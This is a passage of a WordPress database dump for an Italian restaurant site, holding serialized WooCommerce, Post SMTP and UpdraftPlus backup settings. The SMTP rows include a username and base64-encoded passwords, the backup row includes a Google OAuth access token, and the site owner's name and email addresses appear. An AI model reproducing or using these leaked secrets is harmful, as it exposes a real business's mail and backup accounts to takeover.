:\"hour\";i:15;s:6:\"minute\";i:43;s:6:\"second\";i:37;s:6:\"offset\";i:56617;s:8:\"initsend\";i:1591544617;}','yes'),(182550,'sbi_usage_tracking','a:2:{s:9:\"last_send\";i:0;s:7:\"enabled\";b:0;}','yes'),(182702,'mailjet_woo_abandoned_cart_activate','0','yes'),(182711,'mj_profile_name','Teo Pesaresi','yes'),(182713,'skip_mailjet_list','1','yes'),(182907,'woocommerce_marketplace_suggestions','a:2:{s:11:\"suggestions\";a:26:{i:0;a:4:{s:4:\"slug\";s:28:\"product-edit-meta-tab-header\";s:7:\"context\";s:28:\"product-edit-meta-tab-header\";s:5:\"title\";s:22:\"Recommended extensions\";s:13:\"allow-dismiss\";b:0;}i:1;a:6:{s:4:\"slug\";s:39:\"product-edit-meta-tab-footer-browse-all\";s:7:\"context\";s:28:\"product-edit-meta-tab-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:2;a:9:{s:4:\"slug\";s:46:\"product-edit-mailchimp-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-mailchimp\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:116:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/mailchimp-for-memberships.svg\";s:5:\"title\";s:25:\"Mailchimp for Memberships\";s:4:\"copy\";s:79:\"Completely automate your email lists by syncing membership changes to Mailchimp\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/mailchimp-woocommerce-memberships/\";}i:3;a:9:{s:4:\"slug\";s:19:\"product-edit-addons\";s:7:\"product\";s:26:\"woocommerce-product-addons\";s:14:\"show-if-active\";a:2:{i:0;s:25:\"woocommerce-subscriptions\";i:1;s:20:\"woocommerce-bookings\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-add-ons.svg\";s:5:\"title\";s:15:\"Product Add-Ons\";s:4:\"copy\";s:93:\"Offer add-ons like gift wrapping, special messages or other special options for your products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-add-ons/\";}i:4;a:9:{s:4:\"slug\";s:46:\"product-edit-woocommerce-subscriptions-gifting\";s:7:\"product\";s:33:\"woocommerce-subscriptions-gifting\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:116:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/gifting-for-subscriptions.svg\";s:5:\"title\";s:25:\"Gifting for Subscriptions\";s:4:\"copy\";s:70:\"Let customers buy subscriptions for others - they\'re the ultimate gift\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/woocommerce-subscriptions-gifting/\";}i:5;a:9:{s:4:\"slug\";s:42:\"product-edit-teams-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-for-teams\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:112:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/teams-for-memberships.svg\";s:5:\"title\";s:21:\"Teams for Memberships\";s:4:\"copy\";s:123:\"Adds B2B functionality to WooCommerce Memberships, allowing sites to sell team, group, corporate, or family member accounts\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/teams-woocommerce-memberships/\";}i:6;a:8:{s:4:\"slug\";s:29:\"product-edit-variation-images\";s:7:\"product\";s:39:\"woocommerce-additional-variation-images\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:118:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/additional-variation-images.svg\";s:5:\"title\";s:27:\"Additional Variation Images\";s:4:\"copy\";s:72:\"Showcase your products in the best light with a image for each variation\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:73:\"https://woocommerce.com/products/woocommerce-additional-variation-images/\";}i:7;a:9:{s:4:\"slug\";s:47:\"product-edit-woocommerce-subscription-downloads\";s:7:\"product\";s:34:\"woocommerce-subscription-downloads\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:113:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscription-downloads.svg\";s:5:\"title\";s:22:\"Subscription Downloads\";s:4:\"copy\";s:57:\"Give customers special downloads with their subscriptions\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:68:\"https://woocommerce.com/products/woocommerce-subscription-downloads/\";}i:8;a:8:{s:4:\"slug\";s:31:\"product-edit-min-max-quantities\";s:7:\"product\";s:30:\"woocommerce-min-max-quantities\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:109:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/min-max-quantities.svg\";s:5:\"title\";s:18:\"Min/Max Quantities\";s:4:\"copy\";s:81:\"Specify minimum and maximum allowed product quantities for orders to be completed\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/min-max-quantities/\";}i:9;a:8:{s:4:\"slug\";s:28:\"product-edit-name-your-price\";s:7:\"product\";s:27:\"woocommerce-name-your-price\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/name-your-price.svg\";s:5:\"title\";s:15:\"Name Your Price\";s:4:\"copy\";s:70:\"Let customers pay what they want - useful for donations, tips and more\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/name-your-price/\";}i:10;a:8:{s:4:\"slug\";s:42:\"product-edit-woocommerce-one-page-checkout\";s:7:\"product\";s:29:\"woocommerce-one-page-checkout\";s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:108:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/one-page-checkout.svg\";s:5:\"title\";s:17:\"One Page Checkout\";s:4:\"copy\";s:92:\"Don\'t make customers click around - let them choose products, checkout & pay all on one page\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:63:\"https://woocommerce.com/products/woocommerce-one-page-checkout/\";}i:11;a:4:{s:4:\"slug\";s:19:\"orders-empty-header\";s:7:\"context\";s:24:\"orders-list-empty-header\";s:5:\"title\";s:20:\"Tools for your store\";s:13:\"allow-dismiss\";b:0;}i:12;a:6:{s:4:\"slug\";s:30:\"orders-empty-footer-browse-all\";s:7:\"context\";s:24:\"orders-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:13;a:8:{s:4:\"slug\";s:19:\"orders-empty-zapier\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:18:\"woocommerce-zapier\";s:4:\"icon\";s:97:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/zapier.svg\";s:5:\"title\";s:6:\"Zapier\";s:4:\"copy\";s:88:\"Save time and increase productivity by connecting your store to more than 1000+ services\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:52:\"https://woocommerce.com/products/woocommerce-zapier/\";}i:14;a:8:{s:4:\"slug\";s:30:\"orders-empty-shipment-tracking\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:29:\"woocommerce-shipment-tracking\";s:4:\"icon\";s:108:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/shipment-tracking.svg\";s:5:\"title\";s:17:\"Shipment Tracking\";s:4:\"copy\";s:86:\"Let customers know when their orders will arrive by adding shipment tracking to emails\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:51:\"https://woocommerce.com/products/shipment-tracking/\";}i:15;a:8:{s:4:\"slug\";s:32:\"orders-empty-table-rate-shipping\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:31:\"woocommerce-table-rate-shipping\";s:4:\"icon\";s:110:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/table-rate-shipping.svg\";s:5:\"title\";s:19:\"Table Rate Shipping\";s:4:\"copy\";s:122:\"Advanced, flexible shipping. Define multiple shipping rates based on location, price, weight, shipping class or item count\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/table-rate-shipping/\";}i:16;a:8:{s:4:\"slug\";s:40:\"orders-empty-shipping-carrier-extensions\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:4:\"icon\";s:118:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/shipping-carrier-extensions.svg\";s:5:\"title\";s:27:\"Shipping Carrier Extensions\";s:4:\"copy\";s:116:\"Show live rates from FedEx, UPS, USPS and more directly on your store - never under or overcharge for shipping again\";s:11:\"button-text\";s:13:\"Find Carriers\";s:8:\"promoted\";s:26:\"category-shipping-carriers\";s:3:\"url\";s:99:\"https://woocommerce.com/product-category/woocommerce-extensions/shipping-methods/shipping-carriers/\";}i:17;a:8:{s:4:\"slug\";s:32:\"orders-empty-google-product-feed\";s:7:\"context\";s:22:\"orders-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-product-feeds\";s:4:\"icon\";s:110:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/google-product-feed.svg\";s:5:\"title\";s:19:\"Google Product Feed\";s:4:\"copy\";s:76:\"Increase sales by letting customers find you when they\'re shopping on Google\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:53:\"https://woocommerce.com/products/google-product-feed/\";}i:18;a:4:{s:4:\"slug\";s:35:\"products-empty-header-product-types\";s:7:\"context\";s:26:\"products-list-empty-header\";s:5:\"title\";s:23:\"Other types of products\";s:13:\"allow-dismiss\";b:0;}i:19;a:6:{s:4:\"slug\";s:32:\"products-empty-footer-browse-all\";s:7:\"context\";s:26:\"products-list-empty-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:20;a:8:{s:4:\"slug\";s:30:\"products-empty-product-vendors\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-vendors\";s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-vendors.svg\";s:5:\"title\";s:15:\"Product Vendors\";s:4:\"copy\";s:47:\"Turn your store into a multi-vendor marketplace\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-vendors/\";}i:21;a:8:{s:4:\"slug\";s:26:\"products-empty-memberships\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:23:\"woocommerce-memberships\";s:4:\"icon\";s:102:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/memberships.svg\";s:5:\"title\";s:11:\"Memberships\";s:4:\"copy\";s:76:\"Give members access to restricted content or products, for a fee or for free\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:57:\"https://woocommerce.com/products/woocommerce-memberships/\";}i:22;a:9:{s:4:\"slug\";s:35:\"products-empty-woocommerce-deposits\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-deposits\";s:14:\"show-if-active\";a:1:{i:0;s:20:\"woocommerce-bookings\";}s:4:\"icon\";s:99:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/deposits.svg\";s:5:\"title\";s:8:\"Deposits\";s:4:\"copy\";s:75:\"Make it easier for customers to pay by offering a deposit or a payment plan\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-deposits/\";}i:23;a:8:{s:4:\"slug\";s:40:\"products-empty-woocommerce-subscriptions\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:25:\"woocommerce-subscriptions\";s:4:\"icon\";s:104:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/subscriptions.svg\";s:5:\"title\";s:13:\"Subscriptions\";s:4:\"copy\";s:97:\"Let customers subscribe to your products or services and pay on a weekly, monthly or annual basis\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:59:\"https://woocommerce.com/products/woocommerce-subscriptions/\";}i:24;a:8:{s:4:\"slug\";s:35:\"products-empty-woocommerce-bookings\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:20:\"woocommerce-bookings\";s:4:\"icon\";s:99:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/bookings.svg\";s:5:\"title\";s:8:\"Bookings\";s:4:\"copy\";s:99:\"Allow customers to book appointments, make reservations or rent equipment without leaving your site\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:54:\"https://woocommerce.com/products/woocommerce-bookings/\";}i:25;a:8:{s:4:\"slug\";s:30:\"products-empty-product-bundles\";s:7:\"context\";s:24:\"products-list-empty-body\";s:7:\"product\";s:27:\"woocommerce-product-bundles\";s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-bundles.svg\";s:5:\"title\";s:15:\"Product Bundles\";s:4:\"copy\";s:49:\"Offer customizable bundles and assembled products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-bundles/\";}}s:7:\"updated\";i:1611649008;}','no'),(183114,'postman_options','a:43:{s:8:\"enc_type\";s:3:\"tls\";s:8:\"hostname\";s:17:\"in-v3.mailjet.com\";s:4:\"port\";i:25;s:12:\"sender_email\";s:30:\"notifiche@ristorantesolymar.it\";s:15:\"envelope_sender\";s:30:\"notifiche@ristorantesolymar.it\";s:14:\"transport_type\";s:4:\"smtp\";s:12:\"smtp_mailers\";s:8:\"postsmtp\";s:9:\"auth_type\";s:5:\"plain\";s:11:\"sender_name\";s:9:\"Sol Y Mar\";s:15:\"oauth_client_id\";s:0:\"\";s:19:\"oauth_client_secret\";s:0:\"\";s:19:\"basic_auth_username\";s:32:\"78d24bddfbe001b55c3b48515e8f001d\";s:19:\"basic_auth_password\";s:44:\"MmUwMWQ4ZmQ1MWY1NzRmNTU5NjM5ZjdiN2Q1ZTBhMWI=\";s:16:\"mandrill_api_key\";s:0:\"\";s:16:\"sendgrid_api_key\";s:0:\"\";s:15:\"mailgun_api_key\";s:0:\"\";s:19:\"mailgun_domain_name\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:9:\"forced_to\";s:0:\"\";s:9:\"forced_cc\";s:0:\"\";s:10:\"forced_bcc\";s:0:\"\";s:7:\"headers\";s:0:\"\";s:12:\"read_timeout\";i:60;s:18:\"connection_timeout\";i:10;s:9:\"log_level\";i:40000;s:16:\"mail_log_enabled\";s:4:\"true\";s:20:\"mail_log_max_entries\";i:250;s:8:\"run_mode\";s:10:\"production\";s:15:\"transcript_size\";i:128;s:7:\"tmp_dir\";s:4:\"/tmp\";s:21:\"fallback_smtp_enabled\";s:3:\"yes\";s:22:\"fallback_smtp_hostname\";s:25:\"mail.ristorantesolymar.it\";s:18:\"fallback_smtp_port\";i:465;s:22:\"fallback_smtp_security\";s:3:\"ssl\";s:22:\"fallback_smtp_use_auth\";s:5:\"login\";s:19:\"fallback_from_email\";s:30:\"notifiche@ristorantesolymar.it\";s:22:\"fallback_smtp_username\";s:30:\"notifiche@ristorantesolymar.it\";s:22:\"fallback_smtp_password\";s:16:\"U29seW1hcjIwMjA=\";s:20:\"notification_service\";s:7:\"default\";s:13:\"pushover_user\";s:0:\"\";s:14:\"pushover_token\";s:0:\"\";s:11:\"slack_token\";s:0:\"\";s:23:\"notification_chrome_uid\";s:0:\"\";}','yes'),(183115,'postman_state','a:5:{s:15:\"locking_enabled\";b:1;s:12:\"install_date\";i:1591706850;s:7:\"version\";s:6:\"2.0.22\";s:22:\"delivery_success_total\";i:190;s:19:\"delivery_fail_total\";i:68;}','yes'),(183559,'updraftplus_version','1.16.46','yes'),(183561,'updraft_updraftvault','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-32bd22b05d4eacf60ddb8b12d6957d64\";a:3:{s:5:\"token\";s:0:\"\";s:5:\"email\";s:0:\"\";s:5:\"quota\";i:-1;}}}','yes'),(183562,'updraft_dropbox','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-39fc2777750474a0f8f454eb6db349cb\";a:4:{s:6:\"appkey\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:6:\"folder\";s:0:\"\";s:15:\"tk_access_token\";s:0:\"\";}}}','yes'),(183563,'updraft_s3','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-9eef11ab4fc80541c318aed664429e4d\";a:3:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(183564,'updraft_cloudfiles','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-28a784c7ba54e68fbf70ed5cb83e8325\";a:5:{s:7:\"authurl\";s:35:\"https://auth.api.rackspacecloud.com\";s:6:\"region\";s:3:\"DFW\";s:4:\"user\";s:30:\"notifiche@ristorantesolymar.it\";s:6:\"apikey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(183565,'updraft_googledrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-119dd81f938eec2b733e558270c7c12d\";a:9:{s:8:\"clientid\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:5:\"token\";s:0:\"\";s:6:\"folder\";s:11:\"UpdraftPlus\";s:7:\"user_id\";s:64:\"24869c5995b15a21dc42d92b292dd61da6fe3236a2246a3139fec600fd8b9b3e\";s:16:\"tmp_access_token\";a:4:{s:12:\"access_token\";s:181:\"ya29.a0AfH6SMCZAHebb16JuM3sdgm0cGmKeLoBXyoriC2VpoOe_2r6aE14aXA6rXB6I0AoxtFSoQD10Hv5wHNdnf8WJzIuaPBE0veoOzAueCqNB8NsZ6yOMenBRlmHwtmI4YqQ6HLDTeIcB2u2VSbTpl4tRcQEcZhFJblpy4ufKyO_8qJmFw\";s:7:\"created\";i:1611819525;s:10:\"expires_in\";i:3599;s:13:\"refresh_token\";s:0:\"\";}s:10:\"expires_in\";i:1611823094;s:9:\"ownername\";s:12:\"Teo Pesaresi\";s:16:\"instance_enabled\";i:1;}}}','yes'),(183566,'updraft_onedrive','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(183567,'updraft_ftp','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-991524d544336240f8808a21c93139e7\";a:5:{s:4:\"host\";s:0:\"\";s:4:\"user\";s:0:\"\";s:4:\"pass\";s:0:\"\";s:4:\"path\";s:0:\"\";s:7:\"passive\";s:1:\"1\";}}}','yes'),(183568,'updraft_azure','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(183569,'updraft_sftp','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(183570,'updraft_googlecloud','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(183571,'updraft_backblaze','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(183572,'updraft_webdav','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(183573,'updraft_s3generic','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-cd4bff196697c7b9f428079942e078ab\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:0:\"\";}}}','yes'),(183574,'updraft_openstack','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-035df3881c7e9c1bdbf35dc94864499c\";a:6:{s:7:\"authurl\";s:0:\"\";s:6:\"tenant\";s:0:\"\";s:6:\"region\";s:0:\"\";s:4:\"user\";s:0:\"\";s:8:\"password\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(183575,'updraft_dreamobjects','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-75f622d73d6ac4278f13be02d607d27a\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:26:\"objects-us-east-1.dream.io\";}}}','yes'),(183576,'updraftplus-addons_siteid','2cd09051c740557d7d2b75579385081e','no'),(183577,'updraft_retain_extrarules','a:0:{}','yes'),(183578,'updraft_email','','yes'),(183579,'updraft_report_warningsonly','a:0:{}','yes'),(183580,'updraft_report_wholebackup','a:0:{}','yes'),(183581,'updraft_extradbs','a:0:{}','yes'),(183582,'updraft_include_more_path','a:0:{}','yes'),(183583,'updraft_interval','weekly','yes'),(183584,'updraft_retain','2','yes'),(183587,'updraft_interval_database','daily','yes'),(183588,'updraft_retain_db','2','yes'),(183589,'updraft_service','','yes'),(183590,'updraft_include_plugins','1','yes'),(183591,'updraft_include_themes','1','yes'),(183592,'updraft_include_uploads','1','yes'),(183593,'updraft_include_uploads_exclude','backup*,*backups,backwpup*,wp-clone,snapshots','yes'),(183594,'updraft_include_others','1','yes'),(183595,'updraft_include_others_exclude','upgrade,cache,updraft,backup*,*backups,mysql.sql,debug.log','yes'),(183596,'updraft_split_every','400','yes'),(183597,'updraft_delete_local','1','yes'),(183598,'updraft_dir','updraft','yes'),(183599,'updraft_debug_mode','0','yes'),(183600,'updraft_ssl_useservercerts','0','yes'),(183601,'updraft_ssl_disableverify','0','yes'),(183602,'updraft_ssl_nossl','0','yes'),(183606,'updraft_lastmessage','Il backup apparentemente è riuscito ed ora è completo (Apr 19 10:37:58)','yes'),(183607,'updraftplus_unlocked_fd','1','no'),(183608,'updraftplus_last_lock_time_fd','2021-04-07 07:35:15','no'),(183609,'updraftplus_semaphore_fd','0','no'),(183610,'updraft_last_scheduled_fd','1617780915','yes'),(183612,'updraft_backup_history','a:11:{i:1618821475;a:11:{s:2:\"db\";s:51:\"backup_2021-04-19-1037_Sol_Y_Mar_2836b61f0118-db.gz\";s:7:\"db-size\";i:1372279;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"c03f7e41c7dd5cb2961c2f36fed6f463affedfab\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"f447ab636e1d1163ba8c9be8183fe868734ca60c6fe9f6c1b51851094bec23f6\";}}s:5:\"nonce\";s:12:\"2836b61f0118\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:7:\"1.16.53\";s:21:\"last_saved_by_version\";s:7:\"1.16.53\";s:12:\"is_multisite\";b:0;}i:1618743685;a:11:{s:2:\"db\";s:51:\"backup_2021-04-18-1301_Sol_Y_Mar_01eec62ba1ec-db.gz\";s:7:\"db-size\";i:1372295;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:1:{s:3:\"db0\";s:40:\"4c7db1dc50157cf384e0746e4b14ec94f5b33b4d\";}s:6:\"sha256\";a:1:{s:3:\"db0\";s:64:\"420dc2b19aa443248b54a01245567490cb04c634369b2ea630cda28f936e0465\";}}s:5:\"nonce\";s:12:\"01eec62ba1ec\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";N;s:18:\"created_by_version\";s:7:\"1.16.53\";s:21:\"last_saved_by_version\";s:7:\"1.16.53\";s:12:\"is_multisite\";b:0;}i:1618388268;a:17:{s:7:\"plugins\";a:1:{i:0;s:57:\"backup_2021-04-14-1017_Sol_Y_Mar_719a61d6559b-plugins.zip\";}s:12:\"plugins-size\";i:68004678;s:6:\"themes\";a:1:{i:0;s:56:\"backup_2021-04-14-1017_Sol_Y_Mar_719a61d6559b-themes.zip\";}s:11:\"themes-size\";i:28877074;s:7:\"uploads\";a:1:{i:0;s:57:\"backup_2021-04-14-1017_Sol_Y_Mar_719a61d6559b-uploads.zip\";}s:12:\"uploads-size\";i:203355163;s:6:\"others\";a:1:{i:0;s:56:\"backup_2021-04-14-1017_Sol_Y_Mar_719a61d6559b-others.zip\";}s:11:\"others-size\";i:12379982;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:4:{s:8:\"plugins0\";s:40:\"c54710e2bef94b2671e6e42177489061d22be423\";s:7:\"themes0\";s:40:\"706de94116661679fd39912f69c096e21f247639\";s:8:\"uploads0\";s:40:\"41d9c88ee7302db3e2ba3024010cb6b57cbe387f\";s:7:\"others0\";s:40:\"12c95c6d6a3922227a2c68e2a474847e9eb1679c\";}s:6:\"sha256\";a:4:{s:8:\"plugins0\";s:64:\"e07c70cd8e5c878dd6781a3927a2f701013008bc441df5d5f1ae87643f810a16\";s:7:\"themes0\";s:64:\"37247902ba4d0158206079bd350129fc5be206d4dc86b97b8aa630e4b348ec92\";s:8:\"uploads0\";s:64:\"7787766a1c39b675834db8fddb19d8d20fbc35f8806cf67e04483f77813d610f\";s:7:\"others0\";s:64:\"338aba2de8dfcf3f354a34c00a65ee05a91d30954239dd3f9576a5c27fa33bff\";}}s:5:\"nonce\";s:12:\"719a61d6559b\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1618388268;s:6:\"themes\";i:1618388295;s:7:\"uploads\";i:1618388299;s:6:\"others\";i:1618388311;}s:18:\"created_by_version\";s:7:\"1.16.53\";s:21:\"last_saved_by_version\";s:7:\"1.16.53\";s:12:\"is_multisite\";b:0;}i:1617780915;a:18:{s:7:\"plugins\";a:1:{i:0;s:57:\"backup_2021-04-07-0935_Sol_Y_Mar_5339b598b330-plugins.zip\";}s:12:\"plugins-size\";i:68004005;s:6:\"themes\";a:1:{i:0;s:56:\"backup_2021-04-07-0935_Sol_Y_Mar_5339b598b330-themes.zip\";}s:11:\"themes-size\";i:28877074;s:7:\"uploads\";a:1:{i:0;s:57:\"backup_2021-04-07-0935_Sol_Y_Mar_5339b598b330-uploads.zip\";}s:12:\"uploads-size\";i:203354569;s:6:\"others\";a:1:{i:0;s:56:\"backup_2021-04-07-0935_Sol_Y_Mar_5339b598b330-others.zip\";}s:11:\"others-size\";i:12370157;s:7:\"db-size\";i:1373928;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"e6fbfb8a600155508556177713f7b7fd70c2a9d9\";s:7:\"themes0\";s:40:\"2886aaf6e9b764f1b61044e1c3a0f4482fa2390c\";s:8:\"uploads0\";s:40:\"0376d6371cf1205b5c337ab66c1c55cd815cffcc\";s:7:\"others0\";s:40:\"d6aac61f1b24fa376346cd08ece88fe9ba531e51\";s:3:\"db0\";s:40:\"a08b2b9517932ec537e45e9fb17990717e4951e3\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"cfebfd7980272e7bdf7386a7a18809616805be99edc4da88e400e9e68d03ff20\";s:7:\"themes0\";s:64:\"e822f9023b75faf4775891a1ca1fa2917081bc45895101ba88cb5537a54e5b15\";s:8:\"uploads0\";s:64:\"8d2921df8748f99f7b9fbd8c6ae8098e9ff6b2348de07e045aa26b6aee3b78e6\";s:7:\"others0\";s:64:\"39ac7c13ca1cd7f48c3db20565c091df54b0b567e97cea313da193b38a63969a\";s:3:\"db0\";s:64:\"4dbbb79a60115e0e1fe81a0378c8bd5f9abd82181a9204f7bd706e68a70e920e\";}}s:5:\"nonce\";s:12:\"5339b598b330\";s:7:\"service\";a:0:{}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1617780915;s:6:\"themes\";i:1617780947;s:7:\"uploads\";i:1617780951;s:6:\"others\";i:1617780964;}s:18:\"created_by_version\";s:7:\"1.16.53\";s:21:\"last_saved_by_version\";s:7:\"1.16.53\";s:12:\"is_multisite\";b:0;}i:1608019740;a:6:{s:20:\"service_instance_ids\";a:1:{s:11:\"googledrive\";a:1:{i:0;s:34:\"s-119dd81f938eec2b733e558270c7c12d\";}}s:7:\"service\";a:1:{i:0;s:11:\"googledrive\";}s:2:\"db\";a:1:{i:0;s:51:\"backup_2020-12-15-0909_Sol_Y_Mar_b87e989e4e00-db.gz\";}s:5:\"nonce\